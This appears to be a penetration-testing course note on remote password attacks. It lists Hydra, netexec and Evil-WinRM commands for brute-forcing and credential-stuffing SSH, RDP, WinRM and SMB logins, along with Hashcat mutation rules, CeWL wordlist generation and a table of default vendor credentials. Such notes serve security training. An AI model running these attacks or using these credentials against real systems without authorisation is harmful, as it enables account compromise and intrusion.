Remote Password Attacks

Common Network Services Overview

Network services frequently targeted during penetration testing include:

Authentication services (SSH, RDP, WinRM)
File sharing services (FTP, SMB, NFS)
Email services (IMAP/POP3, SMTP)
Database services (MySQL/MSSQL)
Directory services (LDAP)

Attack Methodologies & Tools

Windows Remote Management (WinRM)

Protocol Details:
- Uses WS-Management (SOAP-based XML)
- Ports: TCP 5985 (HTTP), 5986 (HTTPS)
- Requires manual activation on Windows 10+

Netexec (formerly CrackMapExec)

# Installation
sudo apt-get -y install crackmapexec

# Basic Usage
netexec <protocol> <target-IP> -u <user or userlist> -p <password or passwordlist>

# Example
netexec winrm 10.129.42.197 -u user.list -p password.list

Evil-WinRM

# Installation
sudo gem install evil-winrm

# Usage
evil-winrm -i <target-IP> -u <username> -p <password>

Secure Shell (SSH)

Details:
- Default Port: TCP 22
- Uses multiple encryption methods:
  - Symmetric (shared key)
  - Asymmetric (private/public keys)
  - Hashing for message authenticity

# Brute force with Hydra
hydra -L user.list -P password.list ssh://<target-IP>

# Standard connection
ssh <user>@<target-IP>

Remote Desktop Protocol (RDP)

Details:
- Default Port: TCP 3389
- Provides GUI remote access to Windows systems

# Brute force with Hydra
hydra -L user.list -P password.list rdp://<target-IP>

# Connect with xFreeRDP
xfreerdp /v:<target-IP> /u:<username> /p:<password>

Server Message Block (SMB)

Details:
- Ports: TCP 139, 445
- Used for file and printer sharing
- Open-source version: Samba

# Brute force with Hydra
hydra -L user.list -P password.list smb://<target-IP>

# Using Metasploit
use auxiliary/scanner/smb/smb_login

# List shares with netexec
netexec smb $ip -u "$user" -p "$password" --shares

# Connect to shares with smbclient
smbclient -U "$user" \\\\$ip\\$SHARE

Password Mutation Techniques

Using Hashcat Rules

Basic rule syntax:
- : → Do nothing
- l → Convert to lowercase
- u → Convert to uppercase
- c → Capitalize first letter
- sXY → Replace all X with Y
- $! → Add ! to end

# Example custom rule file (custom.rule)
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

# Generate mutations
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

CeWL for Custom Wordlists

# Basic syntax
cewl <URL> -d <depth> -m <min_word_length> --lowercase -w <output_file>

# Example
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist

Credential Stuffing Attacks

Default Credentials

Common examples:

Zyxel (ssh):        zyfwp:PrOw!aN_fXp
APC UPS (web):      apc:apc
Weblogic (web):     system:manager
Kali Linux (OS):    kali:kali
D-Link (web):       admin:admin

Using Hydra for Credential Stuffing

# Basic syntax
hydra -C <user_pass.list> <protocol>://<IP>

# Example
hydra -C default_creds.list ssh://10.129.42.197

Best Practices & Tools Summary

Key Tools

Netexec: Multi-protocol pentesting
Evil-WinRM: WinRM interaction
Hydra: Multi-protocol password brute-forcing
xFreeRDP: RDP client
Hashcat: Password mutation
CeWL: Custom wordlist generation

OSINT Considerations

Research target organization for:
- Naming conventions
- Common applications
- Default credentials
- Password policies
- Breached credentials

Attack Workflow

Gather target information and credentials
Generate custom wordlists using CeWL
Create mutations using Hashcat rules
Attempt credential stuffing with default passwords
Use appropriate tool based on service (Hydra, Netexec, etc.)

PreviousPassword Attacks NextWindows Local Password Attacks

hashtagCommon Network Services Overview

hashtagAttack Methodologies & Tools

hashtagWindows Remote Management (WinRM)

hashtagNetexec (formerly CrackMapExec)

hashtagEvil-WinRM

hashtagSecure Shell (SSH)

hashtagRemote Desktop Protocol (RDP)

hashtagServer Message Block (SMB)

hashtagPassword Mutation Techniques

hashtagUsing Hashcat Rules

hashtagCeWL for Custom Wordlists

hashtagCredential Stuffing Attacks

hashtagDefault Credentials

hashtagUsing Hydra for Credential Stuffing

hashtagBest Practices & Tools Summary

hashtagKey Tools

hashtagOSINT Considerations

hashtagAttack Workflow

Common Network Services Overview

Attack Methodologies & Tools

Windows Remote Management (WinRM)

Netexec (formerly CrackMapExec)

Evil-WinRM

Secure Shell (SSH)

Remote Desktop Protocol (RDP)

Server Message Block (SMB)

Password Mutation Techniques

Using Hashcat Rules

CeWL for Custom Wordlists

Credential Stuffing Attacks

Default Credentials

Using Hydra for Credential Stuffing

Best Practices & Tools Summary

Key Tools

OSINT Considerations

Attack Workflow